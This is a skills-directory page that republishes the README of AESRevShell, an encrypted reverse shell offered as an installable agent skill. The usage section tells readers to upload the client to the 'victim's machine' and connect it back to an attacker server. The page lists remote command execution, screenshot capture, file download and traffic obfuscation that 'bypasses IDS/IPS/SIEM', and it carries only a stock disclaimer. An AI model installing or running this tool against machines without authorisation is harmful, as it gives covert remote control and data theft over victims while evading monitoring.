SkillAgentSearch skills...

AESRevShell

AESRevShell is a highly secure reverse shell tool that uses AES-GCM (256-bit) encryption and ECDH (Curve P-256) to ensure encrypted and protected communication between the server and the client.

GenerateConvertImprove

Install / Use

/learn @OusH4x/AESRevShell
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

AESRevShell

🔐 Overview

AESRevShell is a secure reverse shell tool that utilizes:

  • AES-GCM for authenticated encryption
  • ECDH (Elliptic Curve Diffie-Hellman) for secure key exchange
  • HKDF for key derivation

Ideal for pentesting and security research in monitored environments.

✨ Key Features

| Feature | Description | |---------|-------------| | MITM Protection | ECDH prevents interception | | Forward Secrecy | Ephemeral session keys | | Command Execution | Remote command execution with encrypted responses | | Encrypted Screenshots | Captures and encrypts target screen | | Traffic Obfuscation | Bypasses IDS/IPS/SIEM | | Cross-Platform | Works on Linux/Windows/macOS | | No Key Sharing | Automatic secure exchange |

sequenceDiagram
   participant Server
   participant Client
   Server->>Client: Public Key (ECDH)
   Client->>Server: Public Key (ECDH)
   Note right of Server: Derives shared secret
   Note left of Client: Derives shared secret
   Server->>Client: Encrypted (AES-GCM) Command
   Client->>Server: Encrypted Response

Demos

image image

Installation

  1. Install dependencies:

    sudo apt update && sudo apt install -y python3-pip
python3 -m pip install --upgrade cryptography

  2. Clone the repository:

    git clone https://github.com/OusH4x/AESRevShell
cd AESRevShell

  3. Make the scripts executable:

    chmod +x client.py server.py

🖥️ Usage

  • Upload the 'client.py' into victim's machine

Server (attacker):

Start the server (attacker) with the desired IP and port:

./server.py -i 0.0.0.0 -p 443

Client (victim):

Connect the client (victim) to the server:

./client.py -s SERVER_IP -p SERVER_PORT

Special commands

  • screenshot - Captures target screen
  • download FILE(S) - Download one or more files
  • exit - Terminates session
  • CTRL + L - Clears console

⚠️ Disclaimer

This tool is intended for educational purposes and authorized penetration testing only. Do not use it for malicious purposes. The authors are not responsible for any misuse of this tool.

🤝 Contributing

Contributions are welcome! If you have any suggestions, improvements, or bug fixes, feel free to open an issue or submit a pull request.

Author

Related Skills

node-connect

332.9k

Diagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps

frontend-design

81.9k

Create distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.

openai-whisper-api

332.9k

Transcribe audio via OpenAI Audio Transcriptions API (Whisper).

commit-push-pr

81.9k

Commit, push, and open a PR

OusH4x

View profile

View on GitHub
GitHub Stars16
CategoryDevelopment
Updated1mo ago
Forks7
OusH4x/AESRevShell

Languages

Python

Security Score

75/100

Audited on Feb 20, 2026

No findings